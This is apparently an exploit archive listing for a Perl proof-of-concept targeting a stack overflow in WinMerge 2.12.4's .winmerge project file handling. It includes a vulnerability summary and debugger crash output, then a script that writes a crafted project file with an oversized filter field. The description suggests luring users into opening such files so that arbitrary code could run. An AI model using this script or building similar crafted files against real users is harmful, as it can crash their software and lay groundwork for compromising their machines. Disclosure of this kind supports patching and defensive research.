exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WinMerge 2.12.4 Stack Overflow

WinMerge 2.12.4 Stack Overflow
Posted Feb 22, 2011
Authored by LiquidWorm | Site zeroscience.mk

WinMerge version 2.12.4 project file handling stack overflow exploit.

tags | exploit, overflow
SHA-256 | a90d518f4b58a2d90381a86b1328947e877d00adeda5abb3f18c2dbec603cfa5

WinMerge 2.12.4 Stack Overflow

Change Mirror Download
#!/usr/bin/perl
#
#
# Title: WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability
#
#
# Vendor: Thingamahoochie Software
# Product web page: http://www.winmerge.org
# Affected version: 2.12.4.0 Unicode
#
# Summary: WinMerge is an Open Source differencing and merging tool for Windows.
# WinMerge can compare both folders and files, presenting differences in a visual
# text format that is easy to understand and handle. WinMerge is highly useful for
# determining what has changed between project versions, and then merging changes
# between versions. WinMerge can be used as an external differencing/merging tool
# or as a standalone application.
#
# Desc: WinMerge version 2.12.4 suffers from a stack overflow vulnerability because
# it fails to properly sanitize user supplied input when parsing .winmerge project
# file format resulting in a crash overflowing the memory stack. The attacker can
# use this scenario to lure unsuspecting users to open malicious crafted .winmerge
# files with a potential for arbitrary code execution on the affected system.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# --------------------------------------------------------------------------------
#
# (e34.10b0): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000011 ebx=0001f83c ecx=50000161 edx=7ffe0300 esi=00000000 edi=00c30000
# eip=7c90cf78 esp=00033000 ebp=00033238 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# ntdll!NtAllocateVirtualMemory+0xa:
# 7c90cf78 ff12 call dword ptr [edx] ds:0023:7ffe0300={ntdll!KiFastSystemCall (7c90e510)}
# 0:000> g
# (e34.10b0): C++ EH exception - code e06d7363 (first chance)
# (e34.10b0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000d28 ebx=00523001 ecx=00000000 edx=00000000 esi=00000000 edi=00031ad8
# eip=7c90e8e5 esp=00030c9c ebp=000319d4 iopl=0 nv up ei pl nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# ntdll!strchr+0xd8:
# 7c90e8e5 53 push ebx
#
# --------------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2010-4997
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4997.php
#
#
# 08.02.2011
#


use strict;

my $project = "thricer.winmerge";

my $begining = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E".
"\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D".
"\x38\x22\x20\x73\x74\x61\x6E\x64\x61\x6C\x6F\x6E\x65\x3D\x22\x79\x65".
"\x73\x22\x3F\x3E\x0D\x0A\x0D\x0A\x3C\x70\x72\x6F\x6A\x65\x63\x74\x3E".
"\x0D\x0A\x20\x20\x20\x3C\x70\x61\x74\x68\x73\x3E\x0D\x0A\x20\x20\x20".
"\x20\x20\x20\x3C\x66\x69\x6C\x74\x65\x72\x3E";

my $load = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

my $ending = "\x2A\x2E\x2A\x3C\x2F\x66\x69\x6C\x74\x65\x72\x3E\x0D\x0A\x20\x20\x20".
"\x20\x20\x20\x3C\x73\x75\x62\x66\x6F\x6C\x64\x65\x72\x73\x3E\x30\x3C".
"\x2F\x73\x75\x62\x66\x6F\x6C\x64\x65\x72\x73\x3E\x0D\x0A\x20\x20\x20".
"\x20\x20\x20\x3C\x6C\x65\x66\x74\x2D\x72\x65\x61\x64\x6F\x6E\x6C\x79".
"\x3E\x30\x3C\x2F\x6C\x65\x66\x74\x2D\x72\x65\x61\x64\x6F\x6E\x6C\x79".
"\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x3C\x72\x69\x67\x68\x74\x2D\x72".
"\x65\x61\x64\x6F\x6E\x6C\x79\x3E\x30\x3C\x2F\x72\x69\x67\x68\x74\x2D".
"\x72\x65\x61\x64\x6F\x6E\x6C\x79\x3E\x0D\x0A\x20\x20\x20\x3C\x2F\x70".
"\x61\x74\x68\x73\x3E\x0D\x0A\x3C\x2F\x70\x72\x6F\x6A\x65\x63\x74\x3E".
"\x0D\x0A";


print "\n\n[*] Buffering \"$project\" file ...\n";
open winmerge, ">./$project" || die "\nCan't open $project: $!";
print winmerge $begining.$load x(2391-142+1000).$ending;
sleep 2;
print "\n[*] File created successfully!\n\n";
close winmerge;
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close